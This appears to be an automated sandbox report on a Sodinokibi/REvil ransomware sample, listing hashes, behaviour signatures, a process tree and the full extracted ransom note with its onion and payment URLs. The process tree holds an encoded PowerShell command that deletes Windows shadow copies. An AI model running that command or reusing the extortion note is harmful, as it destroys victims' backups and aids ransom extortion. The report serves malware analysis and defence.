Analysis

  • max time kernel
    137s
  • max time network
    6s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    29-06-2020 07:31

General

  • Target

    b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe

  • Size

    212KB

  • MD5

    c283e5ec517605b6226c29f96f6d1d28

  • SHA1

    43caef6a20ab9e045d76f8bf3e4e96d622f2a6eb

  • SHA256

    b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb

  • SHA512

    8a72a611925f7e504ebde23dba0f23f1cb30613bc1c3f6e36dfa3c8e954e152054a154ad3cc5eaeb4861e776135daa77ce19ebc0b00813d83298fd01ca579955

Malware Config

Extracted

Path

C:\10wd8kx-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 10wd8kx. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5DD7C6CA5594FBE4 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5DD7C6CA5594FBE4 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: +ZoP6C4osx0VS+D1taGMgZyrC/0E+PRJRcbKAPkYzG+yikaFjMxJobTZgVYp3cuR 8lhCUDewVZcraOSSSD7HenBHIccwTTf8MT88jkfLejOEjOhLFHc4ybORRFrHSVyJ 3ZKdGjSv6xF98GQZv0aSulvLvIxh6++waBkHpNn+Qr512d2BPevg4OlW1whdDYeU dfKbrJor9BFubj6PLclTVgaqdpKNVOQ9m6fT8qMmFTjrewXlVi5LKxsDiprRS/yB YNbWZQL1SDhQRy1m/0ASeSAf2iDUylnvKHmBEnnXnYoZ81546jU4srmH42V4cwDG WwppxBDZHYQI2Ik6mAAIQtEFANaZ1oJEYgE5GzSzwFG5utBJ6P5QPOBzYCpHNU5q HPwvXe7HlGZYuPWRzDQA507BsCHCDbIGZYsvFhOzD3V5XvKzuEs/LiZLdycFVM1w 5GFIU6Sy4uPbEMf30unIgCRxd20zsp2H3h1lb/TBchC3mQMhI1LTGrFDltMQ6eko W4ik7kQnjrvsxL7wlUtr0E2IGQAoCAyP22LRMbT56trCV4qr0iXtIZGsjVxYeuzK epzN0h/i+OPC4k/BCyEFTozUFS28meBsD83tu+9yt1lbm8EgYE4/mwZGJYycl8TD CkkPhKgln+L5tV0IrI0l4rt1ctVFQsb0FX8GdMu/pHZsPCUBwNdmpY7v87cCTX7J 8MMibAoikyKFHTO5kKvny0LEQuYUrDGs+Q2W+nT3EMw0SVCVV3/7DfjVXRnNS4Un JbobpITcZOe2V1HGewgD7HJWqt2VvexXC83J3B5hxRkgpXPWaa7d/14uWoce92CG Ke4eGvwxI+lOx8s9LslcG2cx+P8EfHh2+ZvrrE70RYxliS8KjwKIKRSZFQBsrj3l 1ESweU9zKlcGgj4IjiyoUQAo3gUpfCTDRb7VaHeEPXMmbBxury9QxrrxCPW5WXeq X3q+rk+PBx6Y1vwjKYNTS10vi4MMHl9dhgiEE2UXoom6tX7z35imW8r50C72lq2C LNqF24W8Jgcl8r6BATUtNQHebYL1tCXzgTk8uGxT/z68hDRI8hIobfsJ5qwS5V2n bNvCBqCSn0peP82D797c9DCeOs2NkjQkics54AqIMiP4LwZ+5naLKdIUF8tiqe/k BfeO5z+Df8IJgiNvAQ6i0DshQJO/YenpfxNCiRdR4qJ8NIV1JqrUHUp943GFa3rZ bn+o9SeU3Mw2ZrZDGXZpDLlGkTmIvCIXhqvbY1W/qooG8BZL2EcrABfYsRAqoMGo JJ+pbj+3l+A/RX1/x09/Lu7fsrn6F6w6kovpHoUVKO1IVw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5DD7C6CA5594FBE4

http://decryptor.cc/5DD7C6CA5594FBE4

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run entry to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Drops file in Program Files directory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
    "C:\Users\Admin\AppData\Local\Temp\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Sets desktop wallpaper using registry
    • Adds Run entry to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in Program Files directory
    PID:1304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:360
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1512
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Modifies service
      PID:1828

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/360-0-0x0000000000000000-mapping.dmp